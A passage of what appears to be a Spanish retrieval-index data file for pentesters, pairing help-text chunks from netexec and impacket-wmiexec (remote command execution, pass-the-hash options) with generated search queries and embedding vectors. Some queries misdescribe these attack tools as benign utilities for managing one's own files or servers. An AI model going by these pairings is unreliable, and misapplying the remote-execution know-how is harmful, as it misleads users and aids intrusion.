-0.02645, -0.07548, 0.13534, -0.06343, -0.004, -0.12636, -0.03459, 0.04006, 0.01691, -0.00401, -0.01266, 0.03201, 0.00201, 0.0035, -0.04257, 0.08308, -0.00688, 0.01636, 0.07448, -0.03466, -0.02977, -0.0134, -0.01951, -0.04263, 0.06017, 0.0301, 0.02954, -0.08906, -0.12795, 0.00253, -0.09481, -0.09409, 0.02931, -0.01721, -0.04995, -0.02038, 0.03764, -0.04042, 0.02998, 0.02126, 0.0108, 0.01581, 0.01669, 0.01396, -0.01144, 0.07421, 0.01802, 0.00071, -0.15138, 0.12527, -0.04896, 0.03345, -0.04208, 0.02499, -0.04945, -0.0092, -0.05775, -0.01714, -0.02372, -0.05846, -0.02367, -0.05934, -0.09462, -0.05792, 0.02251, 0.02142, -0.09582, -0.04618, 0.05056, -0.00537, 0.03298, -0.04714, -0.04263, 0.02489, 0.11058, 0.03425, -0.0246, 0.07116, -0.059, -0.0526, -0.09067, 0.02555, 0.02565, -0.11353, 0.03256, -0.05647, 0.00932, -0.00967, 0.0081, -0.09311, 0.01578, -0.05875, -0.01958, -0.1115, -0.05189, 0.01005, -0.03991, -0.00947, -0.00773, -0.04853, -0.08894, -0.09845, -0.00492, -0.02209, 0.00386, 0.05169, -0.05527, 0.06376, 0.02993, 0.04632, 0.01221, -0.08168, -0.06409, -0.05292, 0.04989, -0.01244, -0.01121, 0.07827, -0.02569, -0.06215, 0.01085, 0.02972, 0.03644, -0.06574, 0.05088, -0.06887, -0.06059, 0.0662, -0.00453, -0.01103, -0.0451, -0.10623, -0.00139, -0.02522, 0.01289, 0.0407, 0.11109, 0.00197, 0.01421, -0.067, 0.01033, -0.09201, -0.06359, -0.02025, 0.06365, -0.07802, -0.06519, -0.01469, -0.01407, -0.03725, 0.05594, 0.03745, -0.09785, 0.03739, -0.02298, 0.02745, 0.02121, -0.02559, 0.14597, -0.02972, -0.00966, -0.00823, 0.02686, -0.07063, 0.01319, 0.01087, 0.00586, 0.01329, 0.07212, -0.01881, -0.05779, -0.03841, 0.05653, 0.00685, 0.09713, 0.03973, -0.02841, 0.05121, 0.02158, -0.04728, 0.06367, 0.02797, 0.03885, -0.03064, 0.00098, -0.00479, 0.03089, 0.01754, -0.01453, 0.0297, -0.0217, -0.00161, -0.06677, 0.02227, 0.0294, -0.08666, -0.04259, 0.05885, 0.00536, -0.00894, -0.00923, -0.04713]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n --verbose enable verbose output\n --debug enable debug level information\n\nGeneric Options:\n --version Display nxc version\n -t THREADS, --threads THREADS\n set how many concurrent threads to use\n --timeout TIMEOUT max timeout in seconds of each thread\n --jitter INTERVAL sets a random delay between each authentication\n\nOutput Options:\n --no-progress do not displaying progress bar during scan\n --log LOG export result into a custom file\n\nDNS:\n -6 Enable force IPv6\n --dns-server DNS_SERVER\n Specify DNS server (default: Use hosts file & System DNS)\n --dns-tcp Use TCP instead of UDP for DNS queries\n --dns-timeout DNS_TIMEOUT\n DNS query timeout in seconds", "indexar": "que programa sirve para hacer escaneos de red con mΓΊltiples hilos?", "v": [0.02577, -0.01878, -0.22056, -0.01536, 0.04319, -0.1487, -0.16579, -0.08585, -0.00111, -0.04174, -0.0478, -0.06935, 0.1115, -0.1979, 0.20087, 0.01281, -0.04146, -0.08815, 0.01024, 0.0188, -0.03501, 0.03096, -0.12533, 0.05391, -0.06827, 0.07441, 0.07567, 0.03549, -0.07065, 0.11125, -0.04591, 0.08994, 0.00388, -0.10073, -0.03463, 0.01498, -0.05031, 0.0384, -0.00285, -0.01514, -0.03068, 0.04241, -0.13702, -0.0907, -0.06381, -0.06712, -0.02977, 0.08428, -0.05533, 0.077, -0.01109, -0.06686, -0.06844, -0.06816, 0.04975, -0.1302, -0.04865, -0.07827, -0.22467, 0.03428, 0.04308, -0.00698, 0.06262, -0.03166, 0.02235, -0.05618, 0.04102, 0.00346, 0.0204, 0.02258, -0.03642, 0.10822, 0.03021, 0.02006, -0.01792, 0.03505, -0.02369, -0.03239, 0.07004, 0.05723, 0.01444, -0.0061, -0.00541, 0.04514, 0.00285, -0.06795, 0.03962, -0.01638, -0.01588, -0.09954, 0.04479, 0.02991, 0.05852, 0.02365, 0.10403, -0.03626, 0.06512, 0.0562, 0.06594, 0.07501, 0.05417, -0.01265, -0.07412, 0.07232, -0.04112, 0.12559, 0.10351, 0.02875, 0.01486, 0.08212, 0.00329, 0.00936, 0.00074, 0.00041, -0.12768, -0.05742, -0.03586, 0.00727, 0.03067, -0.00274, -0.06625, 0.04629, -0.05417, 0.01485, 0.11485, -0.07729, -0.04558, 0.05522, 0.02455, 0.117, -0.05512, 0.03245, -0.03772, -0.08353, -0.10064, -0.07575, 0.03459, -0.0821, -0.02295, -0.09961, 0.06259, 0.09328, -0.05439, -0.03961, 0.00873, 0.0123, 0.0385, -0.10138, 0.02337, 0.04666, -0.00171, -0.01372, -0.11668, 0.03191, -0.05311, 0.00278, 0.03512, 0.04322, -0.0482, 0.10327, -0.06798, 0.01255, 0.06552, -0.0072, 0.02798, -0.0086, -0.01544, 0.00795, 0.06958, 0.06529, -0.06518, 0.08284, -0.03079, -0.10498, -0.02711, 0.00421, 0.01592, -0.09748, 0.0263, -0.05586, -0.03901, 0.02038, 0.0486, -0.00454, 0.01689, -0.10739, -0.04137, 0.07878, 0.00457, -0.02438, -0.03185, -0.02743, -0.00127, 0.01404, -0.0183, 0.0161, 0.0201, -0.03815, 0.03276, -0.08619, -0.0703, 0.119, 0.01706, -0.04248, 0.04471, 0.10998, -0.01207, -0.00376, 0.07378, 0.13658, 0.03059, -0.04326, 0.07264, -0.00317, -0.00933, -0.02058, 0.00693, 0.01207, 0.05783, 0.03365, 0.0493, -0.04866, 0.00572, 0.08493, -0.05135, -0.04605, 0.05046, -0.04409, 0.02176, 0.0272, 0.00774, -0.04464, -0.01585, 0.00264, -0.00978, -0.04163, 0.041, 0.03595, 0.00102, -0.09835, -0.01079, 0.02847, -0.04991, -0.02012, 0.04095, -0.00136, -0.048, 0.01512, 0.01325, -0.00662, -0.0467, 0.02559, -0.0228, -0.05723, 0.04313, 0.02123]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n --verbose enable verbose output\n --debug enable debug level information\n\nGeneric Options:\n --version Display nxc version\n -t THREADS, --threads THREADS\n set how many concurrent threads to use\n --timeout TIMEOUT max timeout in seconds of each thread\n --jitter INTERVAL sets a random delay between each authentication\n\nOutput Options:\n --no-progress do not displaying progress bar during scan\n --log LOG export result into a custom file\n\nDNS:\n -6 Enable force IPv6\n --dns-server DNS_SERVER\n Specify DNS server (default: Use hosts file & System DNS)\n --dns-tcp Use TCP instead of UDP for DNS queries\n --dns-timeout DNS_TIMEOUT\n DNS query timeout in seconds", "indexar": "con que puedo ejecutar peticiones DNS tanto por UDP como por TCP?", "v": [-0.03839, 0.02445, -0.04328, -0.04842, 0.13603, 0.07429, 0.07092, 0.09115, -0.03504, 0.11843, 0.04234, 0.01054, -0.07789, -0.24556, -0.23352, -0.15895, 0.0587, 0.03046, 0.1517, -0.05038, -0.02089, -0.06923, -0.0522, 0.04253, 0.04347, -0.01787, -0.02362, -0.03807, -0.09232, -0.01794, 0.04711, -0.06542, -0.11814, 0.01031, 0.00061, 0.01388, -0.08105, 0.08559, 0.06111, 0.04979, 0.01963, 0.03183, -0.11752, 0.00522, 0.04983, 0.02701, -0.00382, -0.05101, 0.04004, -0.20781, -0.08618, 0.00266, -0.16519, -0.05709, -0.07227, 0.09578, 0.15948, -0.081, 0.0784, -0.0578, -0.10307, -0.04304, -0.01124, -0.06491, 0.07144, -0.05162, -0.05925, -0.05409, -0.11127, 0.09035, -0.04613, 0.01726, 0.00579, -0.13387, 0.11898, -0.0639, -0.00861, -0.06865, 0.07905, 0.06305, 0.00265, -0.0552, -0.17685, 0.09922, -0.101, -0.02437, 0.01373, -0.07092, -0.03647, -0.09076, 0.0683, 0.04072, 0.00024, 0.1255, 0.10169, 0.00011, -0.00821, 0.01897, -0.05182, 0.03176, -0.00115, 0.11627, -0.03887, -0.02768, -0.00438, 0.00426, 0.08699, -0.04534, 0.10119, 0.00799, -0.01302, 0.0751, -0.09458, -0.08366, -0.00084, -0.06851, -0.13039, -0.02331, 0.01268, -0.03684, -0.0642, -0.06247, -0.06101, -0.01621, 0.05033, -0.00695, -0.00662, -0.02979, -0.00785, -0.00957, 0.05196, 0.0186, -0.11434, -0.09206, -0.04827, 0.03279, -7e-05, -0.06309, 0.04752, -0.0565, 0.01873, 0.06796, 0.00954, -0.05296, 0.06913, -0.0057, -0.02131, -0.04071, -0.01924, 0.02209, 0.04553, -0.03867, -0.00575, -0.01316, -0.02787, -0.02008, -0.00027, -0.07004, 0.00955, 0.11381, -0.03135, 0.00354, -0.03853, -0.02524, 0.01014, 0.00972, -0.07476, 0.05222, 0.01038, -0.01545, -0.01497, 0.03188, -0.04139, -0.02263, 0.03835, -0.07717, -0.02185, -0.06684, 0.07692, 0.05343, -0.03087, -0.0502, -0.00471, 0.0163, 0.00735, -0.0109, 0.04433, -0.00118, 0.04143, 0.01017, 0.02407, 0.07242, -0.03099, -0.00817, -0.04654, -0.00983, 0.00853, -0.08456, 0.00059, -0.01627, -0.00625, -0.07882, 0.0403, -0.06309, -0.04469, -0.00694, -0.02808, 0.14326, -0.04564, 0.0174, 0.03785, -0.00925, 0.03636, -0.01511, -0.03568, 0.02705, -0.01361, 0.02307, -0.0194, -0.01388, -0.03623, 0.03249, 0.05297, -0.0224, -0.01439, -0.06078, 0.00846, 0.00702, 0.04397, 0.05547, 0.02923, 0.04228, -0.00577, -0.07924, 0.01174, 0.03106, -0.02092, -0.01486, -0.03054, 0.01407, -0.00278, 0.01187, 0.00111, 0.00426, 0.06071, -0.056, -0.0918, 0.03068, 0.03899, -0.04127, 0.01566, 0.02184, 0.04959, -0.02432, -0.02064, -0.00907]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n --verbose enable verbose output\n --debug enable debug level information\n\nGeneric Options:\n --version Display nxc version\n -t THREADS, --threads THREADS\n set how many concurrent threads to use\n --timeout TIMEOUT max timeout in seconds of each thread\n --jitter INTERVAL sets a random delay between each authentication\n\nOutput Options:\n --no-progress do not displaying progress bar during scan\n --log LOG export result into a custom file\n\nDNS:\n -6 Enable force IPv6\n --dns-server DNS_SERVER\n Specify DNS server (default: Use hosts file & System DNS)\n --dns-tcp Use TCP instead of UDP for DNS queries\n --dns-timeout DNS_TIMEOUT\n DNS query timeout in seconds", "indexar": "cual es una herramienta que permita configurar tiempos de espera y retrasos aleatorios en los ping?", "v": [-0.00178, 0.13336, -0.19723, -0.13256, 0.10112, -0.07336, 0.00811, -0.03679, -0.10784, -0.0359, -0.07792, 0.05675, 0.02593, -0.04114, 0.0186, 0.00228, 0.03112, 0.05084, 0.16836, 0.05663, -0.10225, 0.01975, -0.11676, -0.00905, 0.01019, -0.08611, 0.06001, -0.03221, -0.2498, 0.05677, -0.02992, 0.05524, 0.06877, -0.00141, -0.054, 0.00194, -0.02387, 0.07566, 0.01027, 0.0827, -0.00727, 0.03206, -0.01548, -0.03784, 0.07521, -0.11445, 0.01361, 0.08229, 0.11988, -0.02748, -0.06821, -0.0333, -0.01019, 0.01301, -0.00443, -0.06443, 0.28791, -0.17687, -0.0144, -0.24276, 0.02329, 0.04647, 0.02947, 0.00135, 0.08361, -0.02558, 0.02039, -0.00476, -0.04591, -0.01425, -0.07722, -0.00376, -0.03296, -0.07943, 0.16602, 0.03481, 0.02937, 0.06751, 0.0072, -0.02784, 0.07574, -0.05203, -0.10334, 0.09185, -0.02667, -0.17268, 0.01508, 0.00257, -0.05582, -0.05092, 0.04705, 0.07763, -0.03086, 0.00398, 0.08065, -0.01697, 0.04713, -0.00255, -0.00572, 0.0107, 0.09808, 0.09494, -0.14771, 0.12117, 0.00388, 0.06792, 0.02629, 0.01123, 0.07538, 0.00817, 0.03135, 0.08918, 0.07553, -0.02785, 0.04593, 0.07353, 0.00619, -0.01248, -0.01604, -0.03425, 0.04278, 0.05651, -0.0693, -0.05714, 0.0073, 0.02112, 0.01403, -0.01061, 0.09373, -0.0263, 0.06628, -0.08367, -0.07568, 0.01426, -0.11861, 0.01289, -0.00638, -0.06628, -0.02712, -0.04907, 0.04153, -0.00884, 0.06704, -0.09654, 0.02802, 0.01076, -0.03845, 0.00044, -0.1252, -0.05471, -0.00315, 0.02229, 0.07351, -0.00897, -0.04563, 0.02341, -0.04805, 0.05393, -0.03796, 0.00479, 0.00719, -0.04798, 0.08336, -0.05431, 0.03191, -0.05178, 0.01015, 0.00261, 0.08253, 0.02815, 0.03104, -0.01598, -0.0214, -0.04691, -0.00499, 0.02807, -0.07449, -4e-05, 0.02345, 0.0065, -0.0223, 0.004, 0.00961, -0.03981, -0.01073, -0.07958, -0.02748, -0.00403, 0.00794, 0.00241, 0.03375, 0.02569, -0.02912, -0.01403, -0.01164, -0.03269, -0.05402, -0.05557, 0.05006, 0.01815, -0.03713, -0.0569, -0.02248, -0.00688, -0.01704, 0.03793, -0.00504, 0.04111, -0.02175, 0.04681, 0.06916, 0.05531, 0.04427, -0.02887, -0.03112, -0.02735, 0.03742, -0.02009, -0.04468, -0.03657, 0.03182, 0.02585, 0.03974, 0.00577, -0.04001, -0.00842, 0.04283, 0.06565, 0.02113, 0.00082, -0.00835, -0.04402, -0.01496, -0.00756, 0.02418, -0.00443, 0.0898, -0.02994, -0.03227, 0.00984, 0.04471, 0.06354, 0.00821, 0.00852, -0.06981, -0.03567, -0.03713, -0.04044, -0.02646, -0.09533, 0.00153, 0.01619, 0.03035, -0.08149, 0.02883, -0.0173]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "indexar": "con que programa puedo administrar mis archivos usando SMB?", "v": [0.06935, -0.00198, -0.01058, -0.19722, -0.01984, -0.0583, -0.10796, -0.1502, -0.23718, -0.03223, -0.11029, -0.01641, 0.14916, -0.08824, -0.04558, 0.07024, 0.10509, -0.09242, 0.03005, 0.08234, 0.15474, 0.06015, 0.0197, -0.04627, -0.0468, -0.03754, 0.03811, 0.03058, -0.05185, -0.0723, -0.0605, 0.05622, 0.15109, -0.07205, 0.03361, 0.04568, -0.02063, 0.05684, -0.03521, 0.12063, 0.03334, 0.01058, -0.05192, 0.01198, 0.03167, -0.04553, 0.09369, -0.06941, -0.01476, -0.03979, -0.05268, -0.0463, -0.06321, 0.07336, 0.00274, -0.05464, -0.03993, -0.21404, -0.05003, 0.081, -0.04639, 0.07779, 0.05967, 0.04966, -0.00098, -0.00909, 0.07265, 0.00645, -0.15983, 0.09134, 0.00082, 0.1352, 0.07537, -0.02783, -0.03158, 0.0982, 0.02265, 0.00481, 0.03962, -0.07095, -0.07514, -0.07014, 0.05263, 0.11455, -0.10109, -0.10953, 0.01605, -0.03819, -0.00362, -0.05457, -0.01002, -0.01323, 0.01571, 0.05464, 0.03072, 0.0023, 0.11062, 0.01243, 0.06682, 0.05613, 0.05334, 0.04341, -0.11071, 0.14318, -0.01779, 0.12971, 0.10878, -0.02727, 0.00774, 0.01028, 0.04772, 0.02025, -0.01117, 0.02385, -0.10824, 0.06079, -0.0471, -0.05838, 0.00639, -0.08316, -0.05132, 0.02976, -0.00472, 0.00849, 0.11389, -0.05425, 0.05123, 0.13568, -0.09036, 0.10574, 0.03217, 0.06181, 0.00952, -0.01018, -0.08512, -0.05834, -0.01541, 0.00757, -0.00713, -0.06683, -0.00252, 0.03116, 0.02785, 0.06443, 0.05815, -0.0099, -0.02916, -0.06798, 0.01716, -0.06981, 0.06237, -0.02206, 0.00853, 0.0464, -0.05564, 0.01766, 0.04098, -0.10357, -0.08466, 0.04565, -0.08268, 0.00693, -0.07075, 0.03177, 0.02062, -0.0655, 0.04514, 0.05718, 0.04214, 0.05465, 0.01009, 0.0872, 0.05377, -0.03559, 0.01778, -0.00928, -0.02142, -0.07029, 0.0836, -0.01423, -0.06731, 0.01836, 0.02569, 0.07774, -0.05755, -0.03308, -0.0174, 0.10041, 0.0043, 0.01706, 0.01907, 0.03855, 0.03459, 0.00805, -0.05007, 0.00128, -0.01889, 0.02721, -0.01418, 0.00062, 0.00426, 0.01533, -0.07743, 0.01464, 0.06712, 0.05139, -0.02502, 0.05426, 0.11045, 0.05872, 0.01302, 0.00462, 0.03722, 0.00987, -0.00932, -0.02704, -0.0269, 0.07685, 0.10216, -0.00315, 0.00412, 0.02449, 0.05233, 0.03258, 0.00396, -0.06062, -0.06505, 0.02332, -0.00205, 0.01663, -0.03038, -0.00844, -0.00433, 0.01797, 0.03572, -0.03313, -0.03586, -0.04521, 0.00628, -0.04464, -0.07313, 0.02455, -0.0133, -0.00804, -0.0293, 0.00751, -0.03289, -0.00266, -0.01373, 0.03139, 0.0319, 0.05785, 0.02385, -0.02824, 0.03518, 0.06716]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "indexar": "cual es una alternativa libre a FTP para compartir mis datos?", "v": [-0.08148, 0.11492, -0.07878, -0.13246, -0.04747, -0.02488, 0.03319, -0.06498, -0.13263, 0.08201, -0.04629, -0.04715, -0.02369, 0.03513, 0.06408, -0.07956, 0.09254, -0.13645, 0.192, -0.17982, -0.11253, -0.00022, -0.09162, -0.19367, -0.08125, -0.0624, 0.00563, 0.01021, -0.08125, 0.00048, 0.26276, -0.10063, -0.03758, 0.0629, 0.02636, 0.1041, 0.16411, 0.09408, 0.04934, -0.14042, 0.06838, 0.06546, -0.07819, 0.12668, 0.02274, -0.07159, -0.14925, -0.00161, 0.14077, 0.04339, 0.00754, 0.00438, -0.02428, 0.0145, -0.04344, -0.05202, 0.12055, -0.18335, 0.02583, 0.1093, -0.12288, 0.02779, -0.00064, -0.08835, -0.02583, -0.02252, -0.0279, 0.01861, -0.13937, 0.17072, 0.05971, 0.04111, -0.02181, -0.04292, -0.04998, 0.00689, -0.03262, 0.0093, -0.02465, 0.01403, 0.01139, -0.06959, -0.00436, 0.0384, -0.06448, -0.0721, 0.11242, -0.02871, -0.03689, 0.02002, 0.06948, 0.08657, -0.07745, 0.0735, 0.0377, 0.00183, 0.03654, 0.01823, -0.01256, 0.02742, 0.01997, 0.07674, -0.07691, 0.03091, 0.0385, -0.03109, 0.00887, 0.06082, -0.0573, -0.00735, 0.0447, 0.0953, 0.0534, -0.00672, -0.01283, -0.08206, -0.05581, -0.03726, -0.00379, 0.03761, -0.04203, -0.06321, -0.02187, -0.01482, -0.02109, 0.02281, 0.02772, 0.06075, -0.05623, 0.08961, 0.05157, -0.05042, -0.06406, -0.09204, -0.03197, 0.02653, 0.03142, -0.08018, 0.01651, -0.06221, -0.02132, 0.00468, -0.07518, 0.0516, 0.06456, -0.05867, 0.0161, -0.01462, -0.02613, -0.05404, -0.04631, -0.0049, -0.00211, -0.01321, -0.05436, 0.01832, 0.00408, -0.03474, -0.08866, 0.05604, -0.00515, 0.01481, 0.01529, -0.00791, 0.00106, -0.02975, 0.03045, -0.02093, -0.02766, -0.01591, 0.01546, 0.108, 0.0463, -0.11338, 0.05357, -0.06108, -0.02644, -0.11306, -0.04268, -0.03186, 0.05758, 0.00114, -0.03022, 0.04141, 0.01663, -0.05009, -0.00791, -0.00718, -0.01661, -0.03094, -0.0123, 0.04481, -0.00382, -0.06503, 0.0209, -0.04852, -0.0307, -0.05683, 0.00136, -0.01375, -0.07141, -0.021, -0.02865, -0.00311, -0.01159, -0.02801, -0.01057, 0.04512, 0.02791, -0.03097, 0.04286, -0.0003, 0.05625, -0.03863, -0.06561, -0.00639, 0.03017, -0.01753, 0.0221, -0.04366, -0.0311, 0.05876, 0.04635, -0.03593, -0.03233, -0.00724, 0.0134, 0.04271, -0.0367, -0.03006, 0.00874, 0.00308, 0.0144, 0.02938, 0.06012, -0.00511, -0.03796, -0.00255, 0.02938, -0.02583, 0.0093, 0.01594, -0.03758, -0.03058, -0.01475, 0.01653, -0.10801, 0.02184, -0.03904, -0.04677, -0.03586, -0.03198, -0.00193, -0.00822, -0.03594, 0.01241]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "indexar": "que herramienta sirve para gestionar servidores con el protocolo SSH?", "v": [-0.03023, -0.04741, -0.23853, -0.29662, 0.00311, -0.24596, 0.00464, -0.22272, 0.04589, 0.04981, -0.06502, 0.07165, 0.14338, -0.2044, 0.06005, 0.07731, 0.11591, -0.09844, -0.03576, 0.13811, 0.01045, 0.09825, 0.0171, 0.00331, -0.05424, 0.0232, 0.10433, -0.08626, -0.1205, 0.05192, 0.00634, -0.04387, 0.03097, -0.07802, 0.01792, 0.02107, -0.09745, 0.12879, -0.07769, 0.12023, -0.0407, 0.01272, -0.10402, -0.00445, 0.07318, -0.04218, 0.0241, -0.04252, 0.06351, 0.08213, -0.09444, -0.09288, -0.10038, 0.0275, -0.1007, 0.0419, 0.05868, -0.13679, -0.02641, -0.05184, -0.14876, -0.02514, -0.01969, 0.01535, 0.03458, -0.05346, 0.06372, -0.04998, -0.11102, -2e-05, -0.05204, 0.04613, 0.01431, -0.02702, 0.01766, -0.01311, -0.02104, 0.06503, 0.07484, 0.04553, -0.00803, 0.02111, -0.03192, 0.05831, -0.09114, -0.05294, -0.00598, 0.00898, 0.0448, -0.0401, -0.08407, 0.04465, -0.06137, -0.06595, 0.06513, 0.00126, 0.07454, -0.06846, 0.05017, 0.0233, 0.11079, -0.00866, -0.06501, 0.04177, -0.02177, 0.07461, 0.02959, -0.06268, 0.03589, -0.02365, 0.00436, -0.01466, 0.04017, 0.05369, -0.05351, 0.04007, -0.02615, -0.02744, -0.02833, 0.05977, -0.02685, 0.00125, -0.01663, 0.02451, 0.04624, -0.03217, 0.03208, 0.07556, 0.03634, -0.04262, -0.03479, -0.03753, -0.06882, 0.0762, -0.04279, -0.03922, 0.03739, -0.06408, -0.05892, -0.06352, -0.05479, 0.0629, -0.04324, -0.02394, 0.07284, -0.06554, 0.10476, -0.05476, -0.04559, 0.04892, 0.06211, -0.05694, -0.05447, 0.01793, -0.11318, 0.00723, -0.01047, -0.01645, -0.1322, 0.0192, -0.0531, -0.05701, 0.05024, 0.11047, 0.04934, 0.01516, 0.0155, -0.00222, 0.05399, 0.03903, 0.05576, -0.01201, 0.05991, 0.00592, -0.02901, -0.05677, -0.11198, -0.03924, 0.0529, 0.00772, -0.01107, 0.02292, -0.02322, 0.02097, -0.00948, -0.03721, -0.02165, 0.03784, -0.01006, 0.01183, 0.00129, 0.03761, 0.02795, 0.0231, 0.028, 0.00443, 0.00457, -0.00815, -0.01057, -0.01881, -0.01137, -0.00133, -0.02333, -0.02242, 0.01992, 0.05773, -0.05893, 0.02035, 0.02132, 0.04054, -0.00856, 0.01155, 0.04396, -0.01108, -0.0177, -0.03807, 0.00244, -0.00619, 0.01987, -0.06277, 0.01552, -0.00886, 0.01821, -0.01614, -0.04343, 0.00545, -0.02423, 0.02153, 0.02687, -0.0401, 0.00894, 0.00789, 0.02405, 0.04461, -0.01627, -0.04152, 0.01707, -0.06529, -0.03385, -0.03718, -0.02624, 0.03966, -0.03571, -0.03881, -0.02168, -0.06537, -0.01704, -0.05026, -0.02657, -0.01198, -0.00207, -0.01507, 0.03685, 0.03338, -0.01343, -0.02728]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-wmiexec β€” manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "indexar": "que herramienta puedo usar para ejecutar comandos en un servidor Windows de forma interactiva", "v": [0.11873, 0.10404, -0.16959, -0.18992, 0.02961, -0.10884, -0.04, -0.08055, 0.02027, -0.09236, -0.1249, -0.08245, 0.02316, -0.08295, -0.0292, 0.092, 0.18722, -0.10851, -0.05438, -0.00527, 0.05541, -0.00608, -0.05739, -0.00722, -0.07132, 0.06052, 0.04094, -0.04025, -0.13172, -0.03559, -0.04992, 0.00748, 0.05951, -0.05271, -0.06897, -0.05569, -0.08821, 0.06464, 0.01058, 0.13457, -0.03062, 0.12839, -0.13675, 0.066, 0.03385, 0.0297, 0.07699, -0.08803, 0.07227, 0.01603, -0.01327, -0.13005, -0.15168, -0.02577, -0.02982, -0.11905, 0.22003, -0.18225, -0.01456, -0.05449, -0.09074, 0.00435, -0.06515, 0.04325, 0.03862, -0.00577, -0.03689, -0.13319, -0.04434, 0.11102, -0.09184, 0.05355, 0.0009, 0.01416, 0.07844, 0.01705, -0.03246, -0.04785, 0.12772, 0.02203, 0.00896, 0.05727, -0.03634, 0.04509, -0.09543, -0.14868, -0.01709, -0.08035, 0.04555, -0.09582, 0.04862, 0.01778, -0.05102, 0.05591, 0.04536, -0.02102, 0.04149, -0.03541, 0.05168, 0.02122, 0.09252, -0.04098, -0.08153, 0.11695, 0.0158, 0.05452, 0.01651, -0.0572, -0.01197, -0.02965, 0.08336, -0.03732, -0.01953, -0.02824, -0.05682, -0.0052, -0.01553, -0.07485, 0.02007, -0.00985, -0.07733, 0.03831, -0.03181, 0.01766, 0.04519, -0.05904, -0.03231, 0.0448, -0.04046, -0.04402, -0.02356, -0.06046, 0.00127, -0.06693, -0.05814, 0.07489, 0.05083, -0.08785, -0.04156, -0.13638, 0.08072, 0.05693, -0.0095, -0.03521, 0.04746, 0.01365, 0.09044, -0.01001, -0.06364, 0.01726, 0.10704, -0.07774, -0.0739, -0.00107, -0.07901, -0.03222, 0.00195, 0.0551, -0.06777, 0.04404, -0.02923, -0.03185, 0.0007, 0.0515, 0.02134, -0.05582, -0.02185, 0.02716, 0.0329, 0.019, 0.0159, 0.06449, 0.03299, -0.03203, 0.01717, -0.05627, -0.07017, 0.01266, -0.00742, -0.04041, -0.02642, 0.02556, -0.05517, -0.04107, -0.03586, -0.03622, -0.00979, 0.01092, -0.07462, 0.01813, -0.05139, 0.07312, 0.02488, -0.03725, 0.06636, -0.01493, 0.01692, -0.00013, -0.02802, -0.03782, -0.0484, -0.00193, -0.0233, -0.0606, 0.05705, 0.03625, -0.04996, 0.06104, 0.04894, 0.03684, 0.01166, -0.01446, 0.07891, -0.01152, -0.00507, -0.06844, 0.03044, -0.02402, -0.01139, -0.02966, 0.00496, 0.02671, 0.05172, -0.02561, 0.02466, 0.01488, -0.04039, -0.01915, 0.02626, -0.02404, 0.00207, 0.00474, 0.00593, -0.00899, 0.02267, -0.05146, 0.01821, -0.02604, -0.04325, -0.04643, -0.03147, 0.09454, -0.00635, -0.05537, -0.03261, -0.08735, -0.03094, -0.01742, -0.05712, -0.07804, -0.01156, -0.02693, 0.05794, -0.04293, -0.05377, 0.0025]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-wmiexec β€” manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] 